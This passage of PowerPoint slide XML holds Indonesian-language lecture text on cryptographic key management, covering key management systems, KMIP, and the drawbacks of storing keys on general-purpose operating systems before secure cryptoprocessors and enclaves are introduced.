              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendeteksian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memusatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Interoperabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (KMIP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server.</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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22224013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Kriptoprosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Enklaf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aman</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>acak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembangkitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketidakteraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi-atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entropi-memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sayangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entropi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>instruksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deterministik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
